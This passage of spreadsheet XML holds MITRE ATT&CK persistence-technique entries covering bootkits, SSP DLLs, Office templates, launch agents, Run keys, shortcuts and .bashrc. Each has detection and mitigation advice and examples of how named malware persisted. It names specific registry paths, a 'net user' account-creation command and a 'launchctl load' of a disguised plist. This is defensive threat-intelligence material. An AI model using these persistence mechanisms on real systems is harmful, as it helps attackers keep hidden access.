Look for abnormal process call trees from known services and for execution of other commands that could relate to [[Discovery]] or other adversary techniques. Services may also be modified through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for [[Privilege Escalation]] weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1031</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).[[CiteRef::MTrends 2016]]
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
===Master Boot Record===
The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.[[CiteRef::Lau 2011]]
===Volume Boot Record===
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis. ,</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised.[[CiteRef::TCG Trusted Platform Module]][[CiteRef::TechNet Secure Boot Process]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1067</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware.[[CiteRef::Wikipedia Hypervisor]] It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen.[[CiteRef::Wikipedia Xen]] A type-1 hypervisor operates at a level below the operating system and could be designed with [[Technique/T1014|Rootkit]] functionality to hide its existence from the guest operating system.[[CiteRef::Myers 2007]] A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present.[[CiteRef::virtualization.info 2006]] ,</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts necessary to install a hypervisor.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1062</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.[[CiteRef::Microsoft Change Default Programs]][[CiteRef::Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example:
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. 
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to [[Discovery]] actions or other techniques. ,</t>
  </si>
  <si>
    <t>Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft's best practices for file associations.[[CiteRef::MSDN File Associations]]
Identify and block potentially malicious software that may be executed by this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1042</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA)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
[[CiteRef::Graeber 2014]]</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]] ,</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1101</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
===Office Template Macros===
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.[[CiteRef::Microsoft Change Normal Template]]
Office Visual Basic for Applications (VBA) macros[[CiteRef::MSDN VBA in Office]] can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.[[CiteRef::enigma0x3 normal.dotm]][[CiteRef::Hexacorn Office Template Macros]]
Word Normal.dotm location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
===Office Test===
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started[[CiteRef::Hexacorn Office Test]]
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
===Add-ins===
Office add-ins can be used to add functionality to Office programs.[[CiteRef::Microsoft Office Add-ins]]
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins.[[CiteRef::MRWLabs Office Persistence Add-ins]]</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.[[CiteRef::MRWLabs Office Persistence Add-ins]]
Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. ,</t>
  </si>
  <si>
    <t>Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros.[[CiteRef::TechNet Office Macro Security]]
For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring [[Privilege Escalation]].[[CiteRef::Palo Alto Office Test Sofacy]]
Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing.[[CiteRef::MRWLabs Office Persistence Add-ins]]</t>
  </si>
  <si>
    <t>Office Test technique: Office 2007, 2010, 2013, 2015 and 2016
Add-ins: some require administrator permissions</t>
  </si>
  <si>
    <t>Ricardo Dias,Loic Jaquemet</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1137</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies[[CiteRef::Writing Bad Malware for OSX]]. There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn?t checked at load time[[CiteRef::Malware Persistence on OS X]].</t>
  </si>
  <si>
    <t>Binary file metadata,Process Monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious. ,</t>
  </si>
  <si>
    <t>Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn?t included as part of an update, it should be investigated.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1161</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Per Apple?s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt;[[CiteRef::AppleDocs Launch Agent Daemons]][[CiteRef::OSX Keydnap malware]][[CiteRef::Antiquated Mac Malware]].  These launch agents have property list files which point to the executables that will be launched[[CiteRef::OSX.Dok Malware]].
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories [[CiteRef::Sofacy Komplex Trojan]] [[CiteRef::Methods of Mac Malware Persistence]]. The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in[[CiteRef::OSX Malware Detection]][[CiteRef::OceanLotus for OS X]]. They can be set up to execute when a specific user logs in (in the specific user?s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See?s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications. ,</t>
  </si>
  <si>
    <t>Restrict user's abilities to create Launch Agents with group policy.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1159</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.[[CiteRef::Wikipedia BIOS]][[CiteRef::Wikipedia UEFI]][[CiteRef::About UEFI]]
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.[[CiteRef::MITRE Trustworthy Firmware Measurement]] Dump and inspect BIOS images on vulnerable systems and compare against known good images.[[CiteRef::MITRE Copernicus]] Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.[[CiteRef::McAfee CHIPSEC Blog]][[CiteRef::Github CHIPSEC]][[CiteRef::Intel HackingTeam UEFI Rootkit]] ,</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology.[[CiteRef::TCG Trusted Platform Module]]</t>
  </si>
  <si>
    <t>Ryan Becwar,McAfee</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1019</t>
  </si>
  <si>
    <t>Login Item</t>
  </si>
  <si>
    <t>MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them[[CiteRef::Adding Login Items]]. Users have direct control over login items installed using a shared file list which are also visible in System Preferences[[CiteRef::Adding Login Items]]. These login items are stored in the user's &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;[[CiteRef::Methods of Mac Malware Persistence]]. Some of these applications can open visible dialogs to the user, but they don?t all have to since there is an option to ?Hide? the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in[[CiteRef::Malware Persistence on OS X]][[CiteRef::OSX.Dok Malware]].</t>
  </si>
  <si>
    <t>All the login items are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area should be monitored and whitelisted for known good applications. Monitor process execution resulting from login actions for unusual or unknown applications. ,</t>
  </si>
  <si>
    <t>Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically[[CiteRef::Re-Open windows on Mac]].</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1162</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [[Technique/T1036|Masquerading]] to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections. ,</t>
  </si>
  <si>
    <t>Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create symbolic links.[[CiteRef::UCF STIG Symbolic Links]]
Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1023</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] uses a WMI event subscription to establish persistence.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.[[CiteRef::FireEye WMI 2015]]</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, &lt;code&gt;~/.bashrc&lt;/code&gt; is executed. This allows users more fine grained control over when they want certain commands executed.
Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process. ,</t>
  </si>
  <si>
    <t>Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1156</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] is capable of persisting via a .lnk file stored in the Startup directory.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0028|SHIPSHAPE]] achieves persistence by creating a shortcut in the Startup folder.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0159|SNUGRIDE]] establishes persistence through a Registry Run key.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] adds a Registry Run key for ctfmon.exe to establish persistence.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can add a Run key entry in the Registry to establish persistence.[[CiteRef::Lastline PlugX Analysis]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] attempts to add a shortcut file in the Startup folder to achieve persistence; if this fails, it attempts to add Registry Run keys.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] installs a registry Run key to establish persistence.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] establishes persistence by creating a shortcut in the Start Menu folder.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0131|TINYTYPHON]] installs itself under Registry Run key to establish persistence.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0035|SPACESHIP]] achieves persistence by creating a shortcut in the current user's Startup folder.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] establishes persistence by creating a shortcut.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has used Registry Run keys to establish persistence.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] establishes persistence by adding a Registry Run key.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors look for and use VPN profiles during an operation to access the network using external VPN services.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>If establishing persistence by installation as a new service fails, one variant of [[Software/S0081|Elise]] establishes persistence for the created .exe file by setting the following Registry key: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe&lt;/code&gt;. Other variants have set the following Registry key for persistence: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self]&lt;/code&gt;. [[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has been known to create or enable accounts, such as &lt;code&gt;support_388945a0&lt;/code&gt;. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password&lt;/code&gt; and &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [[Software/S0039|Net]] can be used to create a local or domain account respectively.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>[[Software/S0108|netsh]] can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.[[CiteRef::Demaske Netsh Persistence]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] used remote access services, including VPN and Outlook Web Access (OWA).[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] uses remote services such as VPN, Citrix, or OWA to persist in an environment.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] added the path of its second-stage malware to the startup folder to achieve persistence.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] can create a shortcut in the Windows startup folder for persistence.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>The [[Software/S0089|BlackEnergy]] 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious msdtc.exe file already created in the %CommonFiles% directory.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has deployed a bootkit along with [[Software/S0134|Downdelph]] to ensure its persistence on the victim. The bootkit shares code with some variants of [[Software/S0089|BlackEnergy]].[[CiteRef::ESET Sednit Part 3]]</t>
  </si>
  <si>
    <t>The [[Software/S0002|Mimikatz]] credential dumper contains an implementation of an SSP.[[CiteRef::Deply Mimikatz]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.[[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can establish persistence by creating a .lnk file in the Start menu. [[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] has established persistence by setting the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key value for &lt;code&gt;wdm&lt;/code&gt; to the path of the executable.[[CiteRef::ThreatStream Evasion Analysis]] It has also used the Registry entry &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn ?%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe?&lt;/code&gt; to establish persistence.[[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe. [[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] tries to add a Registry Run key under the name "Windows Update" to establish persistence.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>adds a Registry Run key to establish persistence.[[CiteRef::Microsoft Win Defender Truvasys Sep 2017]]</t>
  </si>
  <si>
    <t>A dropper used by [[Group/G0024|Putter Panda]] installs itself into the ASEP Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; with a value named McUpdate.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can establish persistence by setting the value ?Shell? with ?explorer.exe, %malware_pathfile%? under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for changes to registry entries in &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&lt;/code&gt; that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values.[[CiteRef::TechNet Autoruns]]  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Upgrade the operating system to a newer version of Windows if using a version prior to Vista. 
Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.
Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1004</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] achieves persistence by making an entry in the Registry's Run key.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>The [[Software/S0162|Komplex]] trojan creates a persistent launch agent called with &lt;code&gt;$HOME/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt; with &lt;code&gt;launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt;[[CiteRef::Sofacy Komplex Trojan]].</t>
  </si>
  <si>
    <t>The "SCOUT" variant of [[Software/S0034|NETEAGLE]] achieves persistence by adding itself to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Group/G0012|Darkhotel]] has been known to establish persistence by adding programs to the Run Registry key.[[CiteRef::Kaspersky Darkhotel]]</t>
  </si>
  <si>
    <t>[[Software/S0080|Mivast]] creates the following Registry entry: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia&lt;/code&gt;.[[CiteRef::Symantec Backdoor.Mivast]]</t>
  </si>
  <si>
    <t>Most [[Software/S0074|Sakula]] samples maintain persistence by setting the Registry Run key &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; in the HKLM or HKCU hive, with the Registry value and file name varying by sample.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used a batch script that adds a Registry Run key to establish malware persistence.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>uses PowerShell to add a Registry Run key in order to establish persistence.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
